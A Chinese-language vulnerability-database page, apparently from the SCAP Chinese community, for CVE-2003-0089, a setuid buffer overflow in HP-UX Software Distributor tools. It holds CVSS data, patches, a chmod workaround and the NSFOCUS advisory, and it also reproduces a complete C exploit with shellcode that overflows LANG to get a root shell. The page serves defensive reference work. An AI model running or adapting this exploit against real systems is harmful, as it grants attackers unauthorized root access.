CVE-2003-0089
CVSS7.2
发布时间 :2003-12-15 00:00:00
修订时间 :2016-10-17 22:29:24
NMCOEPS    

[原文]Buffer overflow in the Software Distributor utilities for HP-UX B.11.00 and B.11.11 allows local users to execute arbitrary code via a long LANG environment variable to setuid programs such as (1) swinstall and (2) swmodify.


[CNNVD]HP-UX Software Distributor本地缓冲区溢出漏洞(CNNVD-200312-038)

        
        HP-UX中的Software Distributor(SD)工具包中包含swinstall等多个程序,这些程序用来创建、安装、分发、管理置软件产品。其中一些设置了suid root属性的程序,例如swinstalll/swmodify等,存在一个缓冲区溢出漏洞,允许本地攻击者以root权限执行任意代码。
        当把环境变量LANG设置成一个超常的字符串时,swinstall等程序没有进行边界检查就将其拷贝到一个固定大小的缓冲区内,这将导致造成堆栈缓冲区溢出,通过覆盖保存在堆栈中的返回地址等数据,本地攻击者可以获取root权限。
        

- CVSS (基础分值)

CVSS分值: 7.2 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/o:hp:hp-ux:11.00HP-UX 11.00
cpe:/o:hp:hp-ux:11.11HP-UX 11.11

- OVAL (用于检测的技术细节)

oval:org.mitre.oval:def:5466HP-UX Running Software Distributor (SD), Local Increased Privileges.
*OVAL详细的描述了检测该漏洞的方法,你可以从相关的OVAL定义中找到更多检测该漏洞的技术细节。

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0089
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0089
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200312-038
(官方数据源) CNNVD

- 其它链接及资源

http://archives.neohapsis.com/archives/vulnwatch/2003-q4/0038.html
(UNKNOWN)  VULNWATCH  20031113 NSFOCUS SA2003-07: HP-UX Software Distributor Buffer Overflow Vulnerability
http://marc.info/?l=bugtraq&m=106873965001431&w=2
(UNKNOWN)  BUGTRAQ  20031113 NSFOCUS SA2003-07: HP-UX Software Distributor Buffer Overflow Vulnerability
http://www.securityfocus.com/advisories/6030
(VENDOR_ADVISORY)  HP  HPSBUX0311-293
http://www.securityfocus.com/bid/8986
(VENDOR_ADVISORY)  BID  8986
http://xforce.iss.net/xforce/xfdb/13623
(VENDOR_ADVISORY)  XF  hp-sd-utilities-bo(13623)

- 漏洞信息

HP-UX Software Distributor本地缓冲区溢出漏洞
高危 边界条件错误
2003-12-15 00:00:00 2009-03-04 00:00:00
本地  
        
        HP-UX中的Software Distributor(SD)工具包中包含swinstall等多个程序,这些程序用来创建、安装、分发、管理置软件产品。其中一些设置了suid root属性的程序,例如swinstalll/swmodify等,存在一个缓冲区溢出漏洞,允许本地攻击者以root权限执行任意代码。
        当把环境变量LANG设置成一个超常的字符串时,swinstall等程序没有进行边界检查就将其拷贝到一个固定大小的缓冲区内,这将导致造成堆栈缓冲区溢出,通过覆盖保存在堆栈中的返回地址等数据,本地攻击者可以获取root权限。
        

- 公告与补丁

        临时解决方法:
        如果您不能立刻安装补丁或者升级,CNNVD建议您暂时去掉SD工具包中所有程序的suid root属性:
        # chmod a-s /usr/sbin/sw*
        厂商补丁:
        HP
        --
        HP已经为此发布了一个安全公告(HPSBUX0311-293)以及相应补丁:
        HPSBUX0311-293:SSRT3656 Buffer overflow in Software Distributor (SD) for HP-UX
        补丁下载:
        HP HP-UX 11.0:
        HP Patch PHCO_28847
        
        http://itrc.hp.com

        HP HP-UX 11.11:
        HP Patch PHCO_28848
        
        http://itrc.hp.com

- 漏洞信息 (23343)

HP-UX 11 Software Distributor Lang Environment Variable Local Buffer Overrun Vulnerability (EDBID:23343)
hp-ux local
2002-12-11 Verified
0 watercloud
N/A [点击下载]
source: http://www.securityfocus.com/bid/8986/info

HP has reported that some Software Distributor (SD) utilities are prone to a locally exploitable buffer-overrun vulnerability. Affected utilities include swinstall(1M) and swverify(1M). 

/*
  Program : x_hpux_11i_sw.c
  Use     : HP-UX 11.11/11.0 exploit swxxx to get local root shell.
  Complie : cc x_hpux_11i_sw.c -o x_sw ;./x_sw  ( not use gcc for some system)
  Usage   : ./x_sw [ off ]
  Tested  : HP-UX B11.11 & HP-UX B11.0
  Author  : watercloud [@] xfocus.org
  Date    : 2002-12-11
  Note    : Use as your own risk !!
*/
#include<stdio.h>
#define T_LEN  2124
#define BUFF_LEN 1688
#define NOP 0x0b390280
char shellcode[]=
  "\x0b\x5a\x02\x9a\x34\x16\x03\xe8\x20\x20\x08\x01\xe4\x20\xe0\x08" 
  "\x96\xd6\x04\x16\xeb\x5f\x1f\xfd\x0b\x39\x02\x99\xb7\x5a\x40\x22"
  "\x0f\x40\x12\x0e\x20\x20\x08\x01\xe4\x20\xe0\x08\xb4\x16\x70\x16"
  "/bin/shA";

long addr;
char buffer_env[2496];
char buffer[T_LEN];

void main(argc,argv)
int argc;
char ** argv;
{
    int addr_off = 8208 ;
    long addr_e = 0;
    int  n=BUFF_LEN/4,i=0;
    long * ap = (long *) &buffer[BUFF_LEN];
    char * sp = &buffer[BUFF_LEN-strlen(shellcode)];
    long * np = (long *) buffer;
    if(argc >0)

    	addr_off += atoi(argv[1]);
    addr = ( (long) &addr_off +addr_off) /4 * 4  +4;
    for(i=0;i<n;np[i++]=NOP);
    memcpy(sp,shellcode,strlen(shellcode));
    for(i=0;i<(T_LEN-BUFF_LEN)/4;ap[i++]=addr);
    buffer[T_LEN -2 ] += 1; buffer[T_LEN - 1 ] = '\0';
    sprintf(buffer_env,"LANG=AAA%s",buffer);
    putenv(buffer_env);
    execl("/usr/sbin/swinstall","swinstall","/tmp/null",NULL);
	/* if  false ,test swverify. */
    execl("/usr/sbin/swverify","swverify",NULL);
}
		

- 漏洞信息 (F32180)

sa2003-07.txt (PacketStormID:F32180)
2003-11-14 00:00:00
NSFOCUS  nsfocus.com
advisory,overflow,local,root
hpux
CVE-2003-0089
[点击下载]

NSFOCUS Security Advisory SA2003-07 - The HP-UX Software Distributor utilities are susceptible to a buffer overflow vulnerability when reading in the LANG variable since they do not perform any bounds checking on its size. Due to this, local attackers could gain root privileges.

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

NSFOCUS Security Advisory(SA2003-07)

Topic: HP-UX Software Distributor Buffer Overflow Vulnerability

Release Date: 2003-11-13

CVE CAN ID: CAN-2003-0089

http://www.nsfocus.com/english/homepage/research/0307.htm

Affected system:
===================

- - HP-UX B.11.00
- - HP-UX B.11.11

Summary:
=========

NSFOCUS Security Team has found a buffer overflow in Software Distributor
utilities for HP-UX. By exploiting the vulnerability local attackers could
gain root privilege.

Description:
============

The Software Distributor(SD) utilities for HP-UX contain a number of programs
such as swinstall. These programs are used to create, install, distribute
and manage software products. A buffer overflow exists in the programs with
suid root bit (such as swinstalll/swmodify etc) and allows local attackers
to run arbitrary code with root privilege.

If the environment variable LANG is set as a over large string, programs such
as swinstall will copy it into a fixed-size buffer without any bound check,
which causes a stack overflow. By overwriting the returned address and other
data in the stack, local attackers could gain root privilege.

Workaround:
=============

NSFOCUS suggests to temporarily remove the suid root bit for all the
programs in SD utilities. 

# chmod a-s /usr/sbin/sw*

Vendor Status:
==============

2002.11.19 Informed the vendor
2002.12.05 Vendor confirmed the vulnerability
2003.11.05 Vendor released a security bulletin (HPSBUX0311-293) and relative
           patches for the vulnerability.

Detailed information for the HP security bulletin is available at:
http://www1.itrc.hp.com/service/cki/docDisplay.do?docId=HPSBUX0311-293

Note: Valid ITRC account is required for the link above.

Patch ID:

HP-UX B.11.00  PHCO_28847
HP-UX B.11.11  PHCO_28848

Additional Information:
========================

The Common Vulnerabilities and Exposures (CVE) project has assigned the 
name CAN-2003-0089 to this issue. This is a candidate for inclusion in the
CVE list (http://cve.mitre.org), which standardizes names for security 
problems. Candidates may change significantly before they become official
CVE entries.

Acknowledgment
===============

Yang Jilong of NSFOCUS Security Team found the vulnerability. 

DISCLAIMS:
==========
THE INFORMATION PROVIDED IS RELEASED BY NSFOCUS "AS IS" WITHOUT WARRANTY
OF ANY KIND. NSFOCUS DISCLAIMS ALL WARRANTIES, EITHER EXPRESS OR IMPLIED,
EXCEPT FOR THE WARRANTIES OF MERCHANTABILITY. IN NO EVENT SHALL NSFOCUS
BE LIABLE FOR ANY DAMAGES WHATSOEVER INCLUDING DIRECT, INDIRECT,
INCIDENTAL,CONSEQUENTIAL, LOSS OF BUSINESS PROFITS OR SPECIAL DAMAGES,
EVEN IF NSFOCUS HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES.
DISTRIBUTION OR REPRODUCTION OF THE INFORMATION IS PROVIDED THAT THE
ADVISORY IS NOT MODIFIED IN ANY WAY.

Copyright 1999-2003 NSFOCUS. All Rights Reserved. Terms of use.


NSFOCUS Security Team <security@nsfocus.com>
NSFOCUS INFORMATION TECHNOLOGY CO.,LTD
(http://www.nsfocus.com)

PGP Key: http://www.nsfocus.com/homepage/research/pgpkey.asc
Key fingerprint = F8F2 F5D1 EF74 E08C 02FE 1B90 D7BF 7877 C6A6 F6DA
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.7 (GNU/Linux)

iD8DBQE/s1Gt1794d8am9toRAi9hAJ9ZDvJdiwPkgd1hSE9IquU06nts2wCfW0UJ
9KQYdGocpQZhGHBHIuB91lQ=
=9nOm
-----END PGP SIGNATURE-----

    

- 漏洞信息

2781
HP-UX Software Distributor Privilege Escalation
Patch / RCS
Vendor Verified

- 漏洞描述

HP-UX Versions B.11.00 and B.11.11 contain a flaw that may allow a malicious local user to escalate their privledges. The vulnerability is casued due to boundary errors in some suid "root" SD (Software Distributor) utilities when handling the "LANG" environment variable. These can be exploited to cause buffer overflows by setting an overly long, specially crafted string.

- 时间线

2003-11-06 Unknow
Unknow 2003-11-05

- 解决方案

Currently, there are no known workarounds or upgrades to correct this issue. However, HP has released a patch to address this vulnerability.

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

HP-UX Software Distributor Lang Environment Variable Local Buffer Overrun Vulnerability
Boundary Condition Error 8986
No Yes
2003-11-03 12:00:00 2006-10-25 08:43:00
Discovery is credited to NSFocus.

- 受影响的程序版本

HP HP-UX 11.11
HP HP-UX 11.0 4
HP HP-UX 11.0

- 漏洞讨论

HP has reported that some Software Distributor (SD) utilities are prone to a locally exploitable buffer-overrun vulnerability. Affected utilities include swinstall(1M) and swverify(1M).

- 漏洞利用

Exploit code from watercloud <watercloud@xfocus.org> is available.

- 解决方案

HP has released fixes.


HP HP-UX 11.0

HP HP-UX 11.0 4

HP HP-UX 11.11

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站